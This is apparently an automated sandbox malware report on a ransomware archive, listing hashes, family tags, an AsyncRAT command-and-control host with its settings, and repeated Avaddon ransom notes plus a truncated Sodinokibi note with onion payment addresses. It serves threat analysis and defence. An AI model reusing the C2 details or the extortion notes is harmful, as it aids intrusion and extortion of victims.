Overview

overview

10

Static

static

1

RNSM00402.7z

windows10-2004-x64

10

Analysis

  • max time kernel
    80s
  • max time network
    363s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-10-2024 21:48

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    RNSM00402.7z

  • Size

    36.6MB

  • MD5

    4fa555cd87d391822d4c06839a56ceed

  • SHA1

    0a5715313aac947dd8190c8743e24e0b51c1c72e

  • SHA256

    ebd9e28da32a109bd324355d667639446e7a11165630f955bb6426542b13d562

  • SHA512

    295929ecc89b2556550ee919e4b015762781f9c97a75de2734528479c8d75dbd265c882e6ed28dab61f2ca6269c33f79371ae58a930099c41af3895df96a3c76

  • SSDEEP

    786432:RS8fJaLSxuMoPTpmlvNYpSTzslLP2Sojx9+BEIN4xJgbxCT3M:RS8foLSZy9svTGL2Sojx9+BNyJKxCT3M

Score
10/10
asyncratavaddoncerbergandcrablimeratsodinokibigithubagilenetbackdoordefense_evasiondiscoveryexecutionimpactransomwareratupx

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

GITHUB

C2

ratsss.publicvm.com:8908

Mutex

Ffg435r34rweFedrr67ryryg23r5$FE$f4gfw$TWfgs34f3fqw2f3qfdfgrsdg5464564eteg45gsdfsdfsafafreg5463ghfhcfvgsdzfsgfhdghb535DFgrsg344563FDGergggfWREFG35343443wtgWRETGREWT443534tfDgedewr4gfedrg34T35grG6SI8OkPnk

Attributes
  • delay

    3

  • install

    false

  • install_file

    svchosts.exe

  • install_folder

    %AppData%

aes.plain

Extracted

Path

C:\Users\Admin\Documents\OneNote Notebooks\q87E3_readme_.txt

Family

avaddon

Ransom Note
-------=== Your network has been infected! ===------- ***************** DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED ***************** All your documents, photos, databases and other important files have been encrypted and have the extension: .abadeCeEcB You are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files! The only way to restore your files is to buy our special software. Only we can give you this software and only we can restore your files! We have also downloaded a lot of private data from your network. If you do not contact as in a 3 days we will post information about your breach on our public news website and after 7 days the whole downloaded info. You can get more information on our page, which is located in a Tor hidden network. How to get to our page -------------------------------------------------------------------------------- | | 1. Download Tor browser - https://www.torproject.org/ | | 2. Install Tor browser | | 3. Open link in Tor browser - avaddonbotrxmuyl.onion | | 4. Follow the instructions on this page | -------------------------------------------------------------------------------- Your ID: -------------------------------------------------------------------------------- Njg3LUwybms2OXNCM1VZNXhOTWo5UDBOQ253V0VHeG9WTVN6ZVArblgwLzQwQWsvU2dERkhzdmxJQ1ZPblR2Wis4NnFmNjNNZVJ0WmNmSHB0WWNNR0dqNTFONEVUbXBPVERwQk5kMzhxTmhSR05PVWtKM1FDb3UxUlRKUmR3M1FXcU95dEFlT2xWdDRQY1BYa21YQ2Y0dURhVnBiOHdiSkJkaVFjNzNjakV0eFBXRkh5eHZKWjhnME12cmNTejdNN1NUMkRJVFdwZ3Q1YVRKR29Fako3aWZFNjY5MFI3cWQ3Yk11WlRCY2g1TGtNWGU4YjBhbXJsSGd4VjZpVUd0N1hucDNZS2hzMm1OalhRMjV0Rnc2d3p3TmphQTc5T21oOXBIajVzQUIyb25ZMTd1TlBVdWNuME1NV0dhTVc4M1J5T2lnUGdjZlpoZWlwRGZiYUF2ODlYMC8yQlA1c255RlVrMjExTGwwSTFZT0ZMY010OVNFVzVkNXJYRnNaYWZveUR4T1QyUU1GSVRFMWw1OGIwSCtsMnVzdSsxVUsxRENGT1AySnNPQlJGcjA1S050MjVQNHZWS1RGb0RTNDlqQXprU2tKdjdCODZMWE1SSDk3d1VWZVBFdHpBMDNiSVhmb2RlUFRtRUE2a1c1N1FRWkQzaWNUbTZDMGxSTVNVaXAvQm1KRCt6czVBbGsvMy9yVWcrY0NDNEt2emdtd3B6cnFaUjRWdmh4WUNQYndacDluMG9ubENzT1RDYWFZTnJjTVR4dnZnK0I0Sk1wanQxdm5QaHNObDE3UlFEMllEd2xsSUhSQ1hBbHVKb0xPbEk3VUNIUzJ2L28rSXhhUlVyNS9iU09IQ0VwU1djRDJUTUt5UCtKR0ZSTzIxTWdEQ1g0Uk5vSWpwcVFCaTZjSWJkNzlVOHNQMUxnUmdrTC9LRjdNYWV4WTY4ZXF4ajNxNE9UaW96ZGVNQWxLbWtueDN0RjF6cEpTeFNpTDMwNHhrWWN4dkhxYUFCc2w0RXlId2JaZ2swUHJNemNrVXNCWUQwRjdpUEtuL3A4Z1VvdHVxeDFNOTZ0QmlPaGE2dUJwRCtzdzNFZ0k0cWhFWTlaTTJ1bmYxVVhkcXJlMUNMY2Nud2NMbU1qaE1kYmdXK3I2UUp5NzNEVDZTNVdOd3JhL0FNMXFYYXBlcmNtU3hsSWtNbzlVdFVlUnh5THJkQTZXeVNJTTh4NVNLenh5c0p2Nnh0MzFrZUtQa3NDM1h0cVNyRjZvdXZLcWljd2JRYlZOeWNsSXFEZTNCMVE3V05VSjNSTjNEQm5hVmJRMStUOUVGYWxqNGd3VG5PTHdlUHhVVEN5cXQ3ekk5ejVTdG1LVGNMMlFPWExWdDNzeStCTGNQTmlnNlZqNkFBUmkzbW5teGQ4NlZQaWErKzVWZDFCM0x5bHBSSHJTejFzWGtHRjhWRS9QOHdnNmNVWE40T3cyR0RjYVlUZCtDNDBJdDZaT0NwNG5wTkpMMzJWUk5GeHpMcWFvQXFkdkJWczdmUEg2Sk80UEtFQ003aDkrNFVtdFZybHJwS3B5Z0NOSGZUU1lDQWs5SHFwaFJYdmNvL3BJdmFiSk04UHFZQmRSSHlzMVA2Q2xTbHFsZzB3Q1A2ckxtNGEwa0w2U2VGaTkzNGRYT0QyQXlSaW45OVZqWW1xamtzbnJPMzJwbzB1UlU5SThYenExYkhHTjgxeVJDTFF6MzlrKy9MbnE5cjBidEhYNm9wWUMxRG8wS0U1dTZvY0IvYk52ajA4eGc3TnQ2ak1xeExOcXZCdnc4dDZGbHNMdURZek9ycVlpQzJHRnlIMkxBSXUyOU9taEhZWHp0aDU0R0V1eEpUeEMrZ2crSXVybWxMQUpXK0gvNWtBUW1xakNsZUdoZGpnbVlpaW0ydWJaVVlyZFVuc2VqNUhDYlBrcCtSZTdibHJsUFdPZHlyR0F4dHI3T2xEdktoWmJNSGV1MzZUNUFsWlV1a3pxZkRvcERGekw5YmpHN2RTYUxmR3RCbUFLYUFTL0Q5SzVZR2FzS2RRRWx0STl0d0pzZk1HYkFqS0hOTDl5KzNBbnlTbm84b0k1Vkg5QTdRK3lVNGJCRUpFRG9wZUpERk1lUkIyVFhhYTZtY3RDKzBFcEp2d2dVUVJaaE1jenZkK3l3PT0= -------------------------------------------------------------------------------- * DO NOT TRY TO RECOVER FILES YOURSELF! * DO NOT MODIFY ENCRYPTED FILES! * * * OTHERWISE, YOU MAY LOSE ALL YOUR FILES FOREVER! * * * cjOjUmTAPQbSe
URLs

http://avaddonbotrxmuyl.onion

Extracted

Path

C:\Users\Admin\Downloads\q87E3_readme_.txt

Family

avaddon

Ransom Note
-------=== Your network has been infected! ===------- ***************** DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED ***************** All your documents, photos, databases and other important files have been encrypted and have the extension: .abadeCeEcB You are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files! The only way to restore your files is to buy our special software. Only we can give you this software and only we can restore your files! We have also downloaded a lot of private data from your network. If you do not contact as in a 3 days we will post information about your breach on our public news website and after 7 days the whole downloaded info. You can get more information on our page, which is located in a Tor hidden network. How to get to our page -------------------------------------------------------------------------------- | | 1. Download Tor browser - https://www.torproject.org/ | | 2. Install Tor browser | | 3. Open link in Tor browser - avaddonbotrxmuyl.onion | | 4. Follow the instructions on this page | -------------------------------------------------------------------------------- Your ID: -------------------------------------------------------------------------------- Njg3LUwybms2OXNCM1VZNXhOTWo5UDBOQ253V0VHeG9WTVN6ZVArblgwLzQwQWsvU2dERkhzdmxJQ1ZPblR2Wis4NnFmNjNNZVJ0WmNmSHB0WWNNR0dqNTFONEVUbXBPVERwQk5kMzhxTmhSR05PVWtKM1FDb3UxUlRKUmR3M1FXcU95dEFlT2xWdDRQY1BYa21YQ2Y0dURhVnBiOHdiSkJkaVFjNzNjakV0eFBXRkh5eHZKWjhnME12cmNTejdNN1NUMkRJVFdwZ3Q1YVRKR29Fako3aWZFNjY5MFI3cWQ3Yk11WlRCY2g1TGtNWGU4YjBhbXJsSGd4VjZpVUd0N1hucDNZS2hzMm1OalhRMjV0Rnc2d3p3TmphQTc5T21oOXBIajVzQUIyb25ZMTd1TlBVdWNuME1NV0dhTVc4M1J5T2lnUGdjZlpoZWlwRGZiYUF2ODlYMC8yQlA1c255RlVrMjExTGwwSTFZT0ZMY010OVNFVzVkNXJYRnNaYWZveUR4T1QyUU1GSVRFMWw1OGIwSCtsMnVzdSsxVUsxRENGT1AySnNPQlJGcjA1S050MjVQNHZWS1RGb0RTNDlqQXprU2tKdjdCODZMWE1SSDk3d1VWZVBFdHpBMDNiSVhmb2RlUFRtRUE2a1c1N1FRWkQzaWNUbTZDMGxSTVNVaXAvQm1KRCt6czVBbGsvMy9yVWcrY0NDNEt2emdtd3B6cnFaUjRWdmh4WUNQYndacDluMG9ubENzT1RDYWFZTnJjTVR4dnZnK0I0Sk1wanQxdm5QaHNObDE3UlFEMllEd2xsSUhSQ1hBbHVKb0xPbEk3VUNIUzJ2L28rSXhhUlVyNS9iU09IQ0VwU1djRDJUTUt5UCtKR0ZSTzIxTWdEQ1g0Uk5vSWpwcVFCaTZjSWJkNzlVOHNQMUxnUmdrTC9LRjdNYWV4WTY4ZXF4ajNxNE9UaW96ZGVNQWxLbWtueDN0RjF6cEpTeFNpTDMwNHhrWWN4dkhxYUFCc2w0RXlId2JaZ2swUHJNemNrVXNCWUQwRjdpUEtuL3A4Z1VvdHVxeDFNOTZ0QmlPaGE2dUJwRCtzdzNFZ0k0cWhFWTlaTTJ1bmYxVVhkcXJlMUNMY2Nud2NMbU1qaE1kYmdXK3I2UUp5NzNEVDZTNVdOd3JhL0FNMXFYYXBlcmNtU3hsSWtNbzlVdFVlUnh5THJkQTZXeVNJTTh4NVNLenh5c0p2Nnh0MzFrZUtQa3NDM1h0cVNyRjZvdXZLcWljd2JRYlZOeWNsSXFEZTNCMVE3V05VSjNSTjNEQm5hVmJRMStUOUVGYWxqNGd3VG5PTHdlUHhVVEN5cXQ3ekk5ejVTdG1LVGNMMlFPWExWdDNzeStCTGNQTmlnNlZqNkFBUmkzbW5teGQ4NlZQaWErKzVWZDFCM0x5bHBSSHJTejFzWGtHRjhWRS9QOHdnNmNVWE40T3cyR0RjYVlUZCtDNDBJdDZaT0NwNG5wTkpMMzJWUk5GeHpMcWFvQXFkdkJWczdmUEg2Sk80UEtFQ003aDkrNFVtdFZybHJwS3B5Z0NOSGZUU1lDQWs5SHFwaFJYdmNvL3BJdmFiSk04UHFZQmRSSHlzMVA2Q2xTbHFsZzB3Q1A2ckxtNGEwa0w2U2VGaTkzNGRYT0QyQXlSaW45OVZqWW1xamtzbnJPMzJwbzB1UlU5SThYenExYkhHTjgxeVJDTFF6MzlrKy9MbnE5cjBidEhYNm9wWUMxRG8wS0U1dTZvY0IvYk52ajA4eGc3TnQ2ak1xeExOcXZCdnc4dDZGbHNMdURZek9ycVlpQzJHRnlIMkxBSXUyOU9taEhZWHp0aDU0R0V1eEpUeEMrZ2crSXVybWxMQUpXK0gvNWtBUW1xakNsZUdoZGpnbVlpaW0ydWJaVVlyZFVuc2VqNUhDYlBrcCtSZTdibHJsUFdPZHlyR0F4dHI3T2xEdktoWmJNSGV1MzZUNUFsWlV1a3pxZkRvcERGekw5YmpHN2RTYUxmR3RCbUFLYUFTL0Q5SzVZR2FzS2RRRWx0STl0d0pzZk1HYkFqS0hOTDl5KzNBbnlTbm84b0k1Vkg5QTdRK3lVNGJCRUpFRG9wZUpERk1lUkIyVFhhYTZtY3RDKzBFcEp2d2dVUVJaaE1jenZkK3l3PT0= -------------------------------------------------------------------------------- * DO NOT TRY TO RECOVER FILES YOURSELF! * DO NOT MODIFY ENCRYPTED FILES! * * * OTHERWISE, YOU MAY LOSE ALL YOUR FILES FOREVER! * * * yLV5pyFyl2J10A94
URLs

http://avaddonbotrxmuyl.onion

Extracted

Path

C:\Users\Admin\Downloads\q87E3_readme_.txt

Family

avaddon

Ransom Note
-------=== Your network has been infected! ===------- ***************** DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED ***************** All your documents, photos, databases and other important files have been encrypted and have the extension: .abadeCeEcB You are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files! The only way to restore your files is to buy our special software. Only we can give you this software and only we can restore your files! We have also downloaded a lot of private data from your network. If you do not contact as in a 3 days we will post information about your breach on our public news website and after 7 days the whole downloaded info. You can get more information on our page, which is located in a Tor hidden network. How to get to our page -------------------------------------------------------------------------------- | | 1. Download Tor browser - https://www.torproject.org/ | | 2. Install Tor browser | | 3. Open link in Tor browser - avaddonbotrxmuyl.onion | | 4. Follow the instructions on this page | -------------------------------------------------------------------------------- Your ID: -------------------------------------------------------------------------------- Njg3LUwybms2OXNCM1VZNXhOTWo5UDBOQ253V0VHeG9WTVN6ZVArblgwLzQwQWsvU2dERkhzdmxJQ1ZPblR2Wis4NnFmNjNNZVJ0WmNmSHB0WWNNR0dqNTFONEVUbXBPVERwQk5kMzhxTmhSR05PVWtKM1FDb3UxUlRKUmR3M1FXcU95dEFlT2xWdDRQY1BYa21YQ2Y0dURhVnBiOHdiSkJkaVFjNzNjakV0eFBXRkh5eHZKWjhnME12cmNTejdNN1NUMkRJVFdwZ3Q1YVRKR29Fako3aWZFNjY5MFI3cWQ3Yk11WlRCY2g1TGtNWGU4YjBhbXJsSGd4VjZpVUd0N1hucDNZS2hzMm1OalhRMjV0Rnc2d3p3TmphQTc5T21oOXBIajVzQUIyb25ZMTd1TlBVdWNuME1NV0dhTVc4M1J5T2lnUGdjZlpoZWlwRGZiYUF2ODlYMC8yQlA1c255RlVrMjExTGwwSTFZT0ZMY010OVNFVzVkNXJYRnNaYWZveUR4T1QyUU1GSVRFMWw1OGIwSCtsMnVzdSsxVUsxRENGT1AySnNPQlJGcjA1S050MjVQNHZWS1RGb0RTNDlqQXprU2tKdjdCODZMWE1SSDk3d1VWZVBFdHpBMDNiSVhmb2RlUFRtRUE2a1c1N1FRWkQzaWNUbTZDMGxSTVNVaXAvQm1KRCt6czVBbGsvMy9yVWcrY0NDNEt2emdtd3B6cnFaUjRWdmh4WUNQYndacDluMG9ubENzT1RDYWFZTnJjTVR4dnZnK0I0Sk1wanQxdm5QaHNObDE3UlFEMllEd2xsSUhSQ1hBbHVKb0xPbEk3VUNIUzJ2L28rSXhhUlVyNS9iU09IQ0VwU1djRDJUTUt5UCtKR0ZSTzIxTWdEQ1g0Uk5vSWpwcVFCaTZjSWJkNzlVOHNQMUxnUmdrTC9LRjdNYWV4WTY4ZXF4ajNxNE9UaW96ZGVNQWxLbWtueDN0RjF6cEpTeFNpTDMwNHhrWWN4dkhxYUFCc2w0RXlId2JaZ2swUHJNemNrVXNCWUQwRjdpUEtuL3A4Z1VvdHVxeDFNOTZ0QmlPaGE2dUJwRCtzdzNFZ0k0cWhFWTlaTTJ1bmYxVVhkcXJlMUNMY2Nud2NMbU1qaE1kYmdXK3I2UUp5NzNEVDZTNVdOd3JhL0FNMXFYYXBlcmNtU3hsSWtNbzlVdFVlUnh5THJkQTZXeVNJTTh4NVNLenh5c0p2Nnh0MzFrZUtQa3NDM1h0cVNyRjZvdXZLcWljd2JRYlZOeWNsSXFEZTNCMVE3V05VSjNSTjNEQm5hVmJRMStUOUVGYWxqNGd3VG5PTHdlUHhVVEN5cXQ3ekk5ejVTdG1LVGNMMlFPWExWdDNzeStCTGNQTmlnNlZqNkFBUmkzbW5teGQ4NlZQaWErKzVWZDFCM0x5bHBSSHJTejFzWGtHRjhWRS9QOHdnNmNVWE40T3cyR0RjYVlUZCtDNDBJdDZaT0NwNG5wTkpMMzJWUk5GeHpMcWFvQXFkdkJWczdmUEg2Sk80UEtFQ003aDkrNFVtdFZybHJwS3B5Z0NOSGZUU1lDQWs5SHFwaFJYdmNvL3BJdmFiSk04UHFZQmRSSHlzMVA2Q2xTbHFsZzB3Q1A2ckxtNGEwa0w2U2VGaTkzNGRYT0QyQXlSaW45OVZqWW1xamtzbnJPMzJwbzB1UlU5SThYenExYkhHTjgxeVJDTFF6MzlrKy9MbnE5cjBidEhYNm9wWUMxRG8wS0U1dTZvY0IvYk52ajA4eGc3TnQ2ak1xeExOcXZCdnc4dDZGbHNMdURZek9ycVlpQzJHRnlIMkxBSXUyOU9taEhZWHp0aDU0R0V1eEpUeEMrZ2crSXVybWxMQUpXK0gvNWtBUW1xakNsZUdoZGpnbVlpaW0ydWJaVVlyZFVuc2VqNUhDYlBrcCtSZTdibHJsUFdPZHlyR0F4dHI3T2xEdktoWmJNSGV1MzZUNUFsWlV1a3pxZkRvcERGekw5YmpHN2RTYUxmR3RCbUFLYUFTL0Q5SzVZR2FzS2RRRWx0STl0d0pzZk1HYkFqS0hOTDl5KzNBbnlTbm84b0k1Vkg5QTdRK3lVNGJCRUpFRG9wZUpERk1lUkIyVFhhYTZtY3RDKzBFcEp2d2dVUVJaaE1jenZkK3l3PT0= -------------------------------------------------------------------------------- * DO NOT TRY TO RECOVER FILES YOURSELF! * DO NOT MODIFY ENCRYPTED FILES! * * * OTHERWISE, YOU MAY LOSE ALL YOUR FILES FOREVER! * * * Kx6SdBYHbe16sbH6uN8
URLs

http://avaddonbotrxmuyl.onion

Extracted

Path

C:\Users\Admin\Pictures\q87E3_readme_.txt

Family

avaddon

Ransom Note
-------=== Your network has been infected! ===------- ***************** DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED ***************** All your documents, photos, databases and other important files have been encrypted and have the extension: .abadeCeEcB You are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files! The only way to restore your files is to buy our special software. Only we can give you this software and only we can restore your files! We have also downloaded a lot of private data from your network. If you do not contact as in a 3 days we will post information about your breach on our public news website and after 7 days the whole downloaded info. You can get more information on our page, which is located in a Tor hidden network. How to get to our page -------------------------------------------------------------------------------- | | 1. Download Tor browser - https://www.torproject.org/ | | 2. Install Tor browser | | 3. Open link in Tor browser - avaddonbotrxmuyl.onion | | 4. Follow the instructions on this page | -------------------------------------------------------------------------------- Your ID: -------------------------------------------------------------------------------- Njg3LUwybms2OXNCM1VZNXhOTWo5UDBOQ253V0VHeG9WTVN6ZVArblgwLzQwQWsvU2dERkhzdmxJQ1ZPblR2Wis4NnFmNjNNZVJ0WmNmSHB0WWNNR0dqNTFONEVUbXBPVERwQk5kMzhxTmhSR05PVWtKM1FDb3UxUlRKUmR3M1FXcU95dEFlT2xWdDRQY1BYa21YQ2Y0dURhVnBiOHdiSkJkaVFjNzNjakV0eFBXRkh5eHZKWjhnME12cmNTejdNN1NUMkRJVFdwZ3Q1YVRKR29Fako3aWZFNjY5MFI3cWQ3Yk11WlRCY2g1TGtNWGU4YjBhbXJsSGd4VjZpVUd0N1hucDNZS2hzMm1OalhRMjV0Rnc2d3p3TmphQTc5T21oOXBIajVzQUIyb25ZMTd1TlBVdWNuME1NV0dhTVc4M1J5T2lnUGdjZlpoZWlwRGZiYUF2ODlYMC8yQlA1c255RlVrMjExTGwwSTFZT0ZMY010OVNFVzVkNXJYRnNaYWZveUR4T1QyUU1GSVRFMWw1OGIwSCtsMnVzdSsxVUsxRENGT1AySnNPQlJGcjA1S050MjVQNHZWS1RGb0RTNDlqQXprU2tKdjdCODZMWE1SSDk3d1VWZVBFdHpBMDNiSVhmb2RlUFRtRUE2a1c1N1FRWkQzaWNUbTZDMGxSTVNVaXAvQm1KRCt6czVBbGsvMy9yVWcrY0NDNEt2emdtd3B6cnFaUjRWdmh4WUNQYndacDluMG9ubENzT1RDYWFZTnJjTVR4dnZnK0I0Sk1wanQxdm5QaHNObDE3UlFEMllEd2xsSUhSQ1hBbHVKb0xPbEk3VUNIUzJ2L28rSXhhUlVyNS9iU09IQ0VwU1djRDJUTUt5UCtKR0ZSTzIxTWdEQ1g0Uk5vSWpwcVFCaTZjSWJkNzlVOHNQMUxnUmdrTC9LRjdNYWV4WTY4ZXF4ajNxNE9UaW96ZGVNQWxLbWtueDN0RjF6cEpTeFNpTDMwNHhrWWN4dkhxYUFCc2w0RXlId2JaZ2swUHJNemNrVXNCWUQwRjdpUEtuL3A4Z1VvdHVxeDFNOTZ0QmlPaGE2dUJwRCtzdzNFZ0k0cWhFWTlaTTJ1bmYxVVhkcXJlMUNMY2Nud2NMbU1qaE1kYmdXK3I2UUp5NzNEVDZTNVdOd3JhL0FNMXFYYXBlcmNtU3hsSWtNbzlVdFVlUnh5THJkQTZXeVNJTTh4NVNLenh5c0p2Nnh0MzFrZUtQa3NDM1h0cVNyRjZvdXZLcWljd2JRYlZOeWNsSXFEZTNCMVE3V05VSjNSTjNEQm5hVmJRMStUOUVGYWxqNGd3VG5PTHdlUHhVVEN5cXQ3ekk5ejVTdG1LVGNMMlFPWExWdDNzeStCTGNQTmlnNlZqNkFBUmkzbW5teGQ4NlZQaWErKzVWZDFCM0x5bHBSSHJTejFzWGtHRjhWRS9QOHdnNmNVWE40T3cyR0RjYVlUZCtDNDBJdDZaT0NwNG5wTkpMMzJWUk5GeHpMcWFvQXFkdkJWczdmUEg2Sk80UEtFQ003aDkrNFVtdFZybHJwS3B5Z0NOSGZUU1lDQWs5SHFwaFJYdmNvL3BJdmFiSk04UHFZQmRSSHlzMVA2Q2xTbHFsZzB3Q1A2ckxtNGEwa0w2U2VGaTkzNGRYT0QyQXlSaW45OVZqWW1xamtzbnJPMzJwbzB1UlU5SThYenExYkhHTjgxeVJDTFF6MzlrKy9MbnE5cjBidEhYNm9wWUMxRG8wS0U1dTZvY0IvYk52ajA4eGc3TnQ2ak1xeExOcXZCdnc4dDZGbHNMdURZek9ycVlpQzJHRnlIMkxBSXUyOU9taEhZWHp0aDU0R0V1eEpUeEMrZ2crSXVybWxMQUpXK0gvNWtBUW1xakNsZUdoZGpnbVlpaW0ydWJaVVlyZFVuc2VqNUhDYlBrcCtSZTdibHJsUFdPZHlyR0F4dHI3T2xEdktoWmJNSGV1MzZUNUFsWlV1a3pxZkRvcERGekw5YmpHN2RTYUxmR3RCbUFLYUFTL0Q5SzVZR2FzS2RRRWx0STl0d0pzZk1HYkFqS0hOTDl5KzNBbnlTbm84b0k1Vkg5QTdRK3lVNGJCRUpFRG9wZUpERk1lUkIyVFhhYTZtY3RDKzBFcEp2d2dVUVJaaE1jenZkK3l3PT0= -------------------------------------------------------------------------------- * DO NOT TRY TO RECOVER FILES YOURSELF! * DO NOT MODIFY ENCRYPTED FILES! * * * OTHERWISE, YOU MAY LOSE ALL YOUR FILES FOREVER! * * * XiJfJa8PHsRD7x3gluy0HlSP3m
URLs

http://avaddonbotrxmuyl.onion

Extracted

Path

C:\Users\Admin\Downloads\q87E3_readme_.txt

Family

avaddon

Ransom Note
-------=== Your network has been infected! ===------- ***************** DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED ***************** All your documents, photos, databases and other important files have been encrypted and have the extension: .abadeCeEcB You are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files! The only way to restore your files is to buy our special software. Only we can give you this software and only we can restore your files! We have also downloaded a lot of private data from your network. If you do not contact as in a 3 days we will post information about your breach on our public news website and after 7 days the whole downloaded info. You can get more information on our page, which is located in a Tor hidden network. How to get to our page -------------------------------------------------------------------------------- | | 1. Download Tor browser - https://www.torproject.org/ | | 2. Install Tor browser | | 3. Open link in Tor browser - avaddonbotrxmuyl.onion | | 4. Follow the instructions on this page | -------------------------------------------------------------------------------- Your ID: -------------------------------------------------------------------------------- Njg3LUwybms2OXNCM1VZNXhOTWo5UDBOQ253V0VHeG9WTVN6ZVArblgwLzQwQWsvU2dERkhzdmxJQ1ZPblR2Wis4NnFmNjNNZVJ0WmNmSHB0WWNNR0dqNTFONEVUbXBPVERwQk5kMzhxTmhSR05PVWtKM1FDb3UxUlRKUmR3M1FXcU95dEFlT2xWdDRQY1BYa21YQ2Y0dURhVnBiOHdiSkJkaVFjNzNjakV0eFBXRkh5eHZKWjhnME12cmNTejdNN1NUMkRJVFdwZ3Q1YVRKR29Fako3aWZFNjY5MFI3cWQ3Yk11WlRCY2g1TGtNWGU4YjBhbXJsSGd4VjZpVUd0N1hucDNZS2hzMm1OalhRMjV0Rnc2d3p3TmphQTc5T21oOXBIajVzQUIyb25ZMTd1TlBVdWNuME1NV0dhTVc4M1J5T2lnUGdjZlpoZWlwRGZiYUF2ODlYMC8yQlA1c255RlVrMjExTGwwSTFZT0ZMY010OVNFVzVkNXJYRnNaYWZveUR4T1QyUU1GSVRFMWw1OGIwSCtsMnVzdSsxVUsxRENGT1AySnNPQlJGcjA1S050MjVQNHZWS1RGb0RTNDlqQXprU2tKdjdCODZMWE1SSDk3d1VWZVBFdHpBMDNiSVhmb2RlUFRtRUE2a1c1N1FRWkQzaWNUbTZDMGxSTVNVaXAvQm1KRCt6czVBbGsvMy9yVWcrY0NDNEt2emdtd3B6cnFaUjRWdmh4WUNQYndacDluMG9ubENzT1RDYWFZTnJjTVR4dnZnK0I0Sk1wanQxdm5QaHNObDE3UlFEMllEd2xsSUhSQ1hBbHVKb0xPbEk3VUNIUzJ2L28rSXhhUlVyNS9iU09IQ0VwU1djRDJUTUt5UCtKR0ZSTzIxTWdEQ1g0Uk5vSWpwcVFCaTZjSWJkNzlVOHNQMUxnUmdrTC9LRjdNYWV4WTY4ZXF4ajNxNE9UaW96ZGVNQWxLbWtueDN0RjF6cEpTeFNpTDMwNHhrWWN4dkhxYUFCc2w0RXlId2JaZ2swUHJNemNrVXNCWUQwRjdpUEtuL3A4Z1VvdHVxeDFNOTZ0QmlPaGE2dUJwRCtzdzNFZ0k0cWhFWTlaTTJ1bmYxVVhkcXJlMUNMY2Nud2NMbU1qaE1kYmdXK3I2UUp5NzNEVDZTNVdOd3JhL0FNMXFYYXBlcmNtU3hsSWtNbzlVdFVlUnh5THJkQTZXeVNJTTh4NVNLenh5c0p2Nnh0MzFrZUtQa3NDM1h0cVNyRjZvdXZLcWljd2JRYlZOeWNsSXFEZTNCMVE3V05VSjNSTjNEQm5hVmJRMStUOUVGYWxqNGd3VG5PTHdlUHhVVEN5cXQ3ekk5ejVTdG1LVGNMMlFPWExWdDNzeStCTGNQTmlnNlZqNkFBUmkzbW5teGQ4NlZQaWErKzVWZDFCM0x5bHBSSHJTejFzWGtHRjhWRS9QOHdnNmNVWE40T3cyR0RjYVlUZCtDNDBJdDZaT0NwNG5wTkpMMzJWUk5GeHpMcWFvQXFkdkJWczdmUEg2Sk80UEtFQ003aDkrNFVtdFZybHJwS3B5Z0NOSGZUU1lDQWs5SHFwaFJYdmNvL3BJdmFiSk04UHFZQmRSSHlzMVA2Q2xTbHFsZzB3Q1A2ckxtNGEwa0w2U2VGaTkzNGRYT0QyQXlSaW45OVZqWW1xamtzbnJPMzJwbzB1UlU5SThYenExYkhHTjgxeVJDTFF6MzlrKy9MbnE5cjBidEhYNm9wWUMxRG8wS0U1dTZvY0IvYk52ajA4eGc3TnQ2ak1xeExOcXZCdnc4dDZGbHNMdURZek9ycVlpQzJHRnlIMkxBSXUyOU9taEhZWHp0aDU0R0V1eEpUeEMrZ2crSXVybWxMQUpXK0gvNWtBUW1xakNsZUdoZGpnbVlpaW0ydWJaVVlyZFVuc2VqNUhDYlBrcCtSZTdibHJsUFdPZHlyR0F4dHI3T2xEdktoWmJNSGV1MzZUNUFsWlV1a3pxZkRvcERGekw5YmpHN2RTYUxmR3RCbUFLYUFTL0Q5SzVZR2FzS2RRRWx0STl0d0pzZk1HYkFqS0hOTDl5KzNBbnlTbm84b0k1Vkg5QTdRK3lVNGJCRUpFRG9wZUpERk1lUkIyVFhhYTZtY3RDKzBFcEp2d2dVUVJaaE1jenZkK3l3PT0= -------------------------------------------------------------------------------- * DO NOT TRY TO RECOVER FILES YOURSELF! * DO NOT MODIFY ENCRYPTED FILES! * * * OTHERWISE, YOU MAY LOSE ALL YOUR FILES FOREVER! * * * uqQ2emuC7U9ITNhiwRO7SQ4QQwoiD
URLs

http://avaddonbotrxmuyl.onion

Extracted

Path

C:\Users\9597fr48-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 9597fr48. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/FA3B0F6938582C86 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/FA3B0F6938582C86 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: 